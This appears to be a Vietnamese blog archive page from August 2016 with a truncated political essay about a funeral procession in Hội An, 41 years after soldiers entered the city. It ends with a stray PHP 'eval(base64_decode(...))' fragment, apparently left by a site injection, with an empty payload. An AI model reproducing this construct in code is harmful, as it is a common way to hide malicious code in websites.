Archive for August 9th, 2016

Đoàn xe tang trên đường phố Hội An

Đoàn xe tang trên đường phố Hội An

Ngày đó, 41 năm trước, những người này hay cha mẹ những người này ngồi trên những chiếc Molotova dơ dáy, phủ những nhánh cây rừng, đội nón tai bèo, tay cầm súng AK, khuôn mặt hằm hằm tiến vào thành phố. Ngày này, 41 năm sau, những

08.9.2016 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>